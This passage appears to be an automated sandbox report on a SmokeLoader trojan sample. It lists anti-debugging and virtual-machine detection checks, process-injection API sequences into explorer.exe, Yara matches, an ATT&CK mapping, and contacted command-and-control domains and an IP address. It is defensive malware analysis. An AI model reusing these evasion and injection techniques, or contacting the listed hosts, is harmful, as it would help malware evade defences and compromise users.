                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_00425400 WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_00425400
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_004255C0 DisconnectNamedPipe,AddAtomA,GetSystemWindowsDirectoryW,ReadConsoleInputA,WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_004255C0
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_004255F6 ReadConsoleInputA,WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_004255F6
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_004255F4 ReadConsoleInputA,WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_004255F4
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_00425659 WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_00425659
                Source: explorer.exe, 00000003.00000000.1559516725.0000000000889000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000/;
                Source: explorer.exe, 00000003.00000000.1559516725.0000000000889000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000o;
                Source: explorer.exe, 00000003.00000000.1567932050.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 00000003.00000000.1567932050.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000003.00000000.1567258720.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2728248249.00000000094DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: explorer.exe, 00000003.00000000.1567932050.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTbrVMWare
                Source: explorer.exe, 00000003.00000000.1567932050.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}?
                Source: explorer.exe, 00000003.00000002.2728248249.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.000000000952D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000003.00000000.1567258720.00000000093B4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: explorer.exe, 00000003.00000000.1567258720.00000000093B4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
                Source: explorer.exe, 00000003.00000002.2728248249.00000000094DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %SystemRoot%\system32\mswsock.dlldRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: explorer.exe, 00000003.00000000.1567932050.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                Source: explorer.exe, 00000003.00000002.2725144997.0000000002FC0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\e6reA52T4I.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\e6reA52T4I.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                Source: C:\Users\user\Desktop\e6reA52T4I.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\hdeufvwSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\Desktop\e6reA52T4I.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\hdeufvwProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_0040AB19 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040AB19
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_004117B2 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_004117B2
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_00930042 push dword ptr fs:[00000030h]0_2_00930042
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_00AC2B5D push dword ptr fs:[00000030h]0_2_00AC2B5D
                Source: C:\Users\user\AppData\Roaming\hdeufvwCode function: 5_2_00860042 push dword ptr fs:[00000030h]5_2_00860042
                Source: C:\Users\user\AppData\Roaming\hdeufvwCode function: 5_2_00991D1D push dword ptr fs:[00000030h]5_2_00991D1D
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_0040C0AA SetUnhandledExceptionFilter,0_2_0040C0AA
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_0040AB19 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040AB19

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Benign windows process drops PE files
                Source: C:\Windows\explorer.exeFile created: hdeufvw.3.drJump to dropped file
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 188.40.141.211 80Jump to behavior
                Contains functionality to inject code into remote processes
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_00930110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_00930110
                Creates a thread in another existing process (thread injection)
                Source: C:\Users\user\Desktop\e6reA52T4I.exeThread created: C:\Windows\explorer.exe EIP: B31930Jump to behavior
                Source: C:\Users\user\AppData\Roaming\hdeufvwThread created: unknown EIP: 83F1930Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\e6reA52T4I.exeMemory written: C:\Users\user\Desktop\e6reA52T4I.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\hdeufvwMemory written: C:\Users\user\AppData\Roaming\hdeufvw base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\e6reA52T4I.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\Desktop\e6reA52T4I.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\hdeufvwSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\hdeufvwSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\Desktop\e6reA52T4I.exeProcess created: C:\Users\user\Desktop\e6reA52T4I.exe "C:\Users\user\Desktop\e6reA52T4I.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\hdeufvwProcess created: C:\Users\user\AppData\Roaming\hdeufvw C:\Users\user\AppData\Roaming\hdeufvwJump to behavior
                Source: explorer.exe, 00000003.00000000.1561646634.0000000004460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2724412389.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1560321876.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000003.00000002.2724412389.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1560321876.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000003.00000002.2724412389.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1560321876.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
                Source: explorer.exe, 00000003.00000002.2723738796.0000000000889000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1559516725.0000000000889000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
                Source: explorer.exe, 00000003.00000002.2724412389.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1560321876.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_0040E45D
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0040E8D8
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_0040ECA0
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: _GetPrimaryLen,EnumSystemLocalesA,0_2_0040ED60
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_0040E16F
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_0040D513
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: GetLocaleInfoA,0_2_0040AD2F
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,0_2_004095C4
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: _GetPrimaryLen,EnumSystemLocalesA,0_2_0040EDC7
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_0040E9CD
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: GetLocaleInfoW,_GetPrimaryLen,0_2_0040EA74
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,0_2_0040EE03
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_TestDefaultLanguage,0_2_0040EACF
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,0_2_00411EDD
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,0_2_00411B1D
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00411BF7
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,0_2_0040BBBA
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_0040C580 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0040C580
                Source: C:\Windows\explorer.exeCode function: 3_2_00B33534 GetUserNameW,3_2_00B33534

                Stealing of Sensitive Information

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 5.2.hdeufvw.8615a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.hdeufvw.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.e6reA52T4I.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e6reA52T4I.exe.9315a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1863904346.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1577083390.0000000002341000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1863662169.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1576706084.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 5.2.hdeufvw.8615a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.hdeufvw.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.e6reA52T4I.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e6reA52T4I.exe.9315a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1863904346.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1577083390.0000000002341000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1863662169.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1576706084.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		2
                Obfuscated Files or Information                		OS Credential Dumping1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Exploitation for Client Execution                		Boot or Logon Initialization Scripts512
                Process Injection                		12
                Software Packing                		LSASS Memory1
                Account Discovery                		Remote Desktop ProtocolData from Removable Media1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts2
                Command and Scripting Interpreter                		Logon Script (Windows)Logon Script (Windows)1
                DLL Side-Loading                		Security Account Manager1
                File and Directory Discovery                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                File Deletion                		NTDS113
                System Information Discovery                		Distributed Component Object ModelInput Capture113
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Masquerading                		LSA Secrets521
                Security Software Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                Virtualization/Sandbox Evasion                		Cached Domain Credentials12
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items512
                Process Injection                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Hidden Files and Directories                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Indicator Removal                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571560 Sample: e6reA52T4I.exe Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 27 host-file-host6.com 2->27 31 Suricata IDS alerts for network traffic 2->31 33 Found malware configuration 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 6 other signatures 2->37 8 e6reA52T4I.exe 2->8         started        11 hdeufvw 2->11         started        signatures3 process4 signatures5 47 Detected unpacking (changes PE section rights) 8->47 49 Contains functionality to inject code into remote processes 8->49 51 Injects a PE file into a foreign processes 8->51 53 Switches to a custom stack to bypass stack traces 8->53 13 e6reA52T4I.exe 8->13         started        55 Antivirus detection for dropped file 11->55 57 Multi AV Scanner detection for dropped file 11->57 59 Machine Learning detection for dropped file 11->59 16 hdeufvw 11->16         started        process6 signatures7 61 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 13->61 63 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 13->63 65 Maps a DLL or memory area into another process 13->65 18 explorer.exe 38 3 13->18 injected 67 Checks if the current machine is a virtual machine (disk enumeration) 16->67 69 Creates a thread in another existing process (thread injection) 16->69 process8 dnsIp9 29 host-file-host6.com 188.40.141.211, 49705, 80 HETZNER-ASDE Germany 18->29 23 C:\Users\user\AppData\Roaming\hdeufvw, PE32 18->23 dropped 25 C:\Users\user\...\hdeufvw:Zone.Identifier, ASCII 18->25 dropped 39 System process connects to network (likely due to code injection or exploit) 18->39 41 Benign windows process drops PE files 18->41 43 Deletes itself after installation 18->43 45 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->45 file10 signatures11

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                e6reA52T4I.exe88%ReversingLabsWin32.Trojan.SmokeLoader
                e6reA52T4I.exe100%AviraHEUR/AGEN.1312455
                e6reA52T4I.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\hdeufvw100%AviraHEUR/AGEN.1312455
                C:\Users\user\AppData\Roaming\hdeufvw100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\hdeufvw82%ReversingLabsWin32.Trojan.SmokeLoader

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT0%Avira URL Cloudsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark0%Avira URL Cloudsafe
                http://iwtkhvgidl.com/application/x-www-form-urlencodedMozilla/5.00%Avira URL Cloudsafe
                http://lrvsgmets.com/ings#U0%Avira URL Cloudsafe
                http://lrvsgmets.com/0%Avira URL Cloudsafe
                http://iwtkhvgidl.com/0%Avira URL Cloudsafe
                http://ubpctscp.net/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                host-file-host6.com
                		188.40.141.211
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://host-host-file8.com/false
                    		high
                    http://host-file-host6.com/false
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000003.00000002.2728248249.00000000093B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.00000000093B4000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://wns.windows.com/batexplorer.exe, 00000003.00000002.2729091529.0000000009730000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567932050.0000000009730000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-yearsexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.msn.com/en-us/health/wellness/7-secrets-to-a-happy-old-age-backed-by-science/ss-AA1hwpvWexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1560749669.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2725120474.0000000002FAE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2160909018.0000000002FAD000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three-explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&ocexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
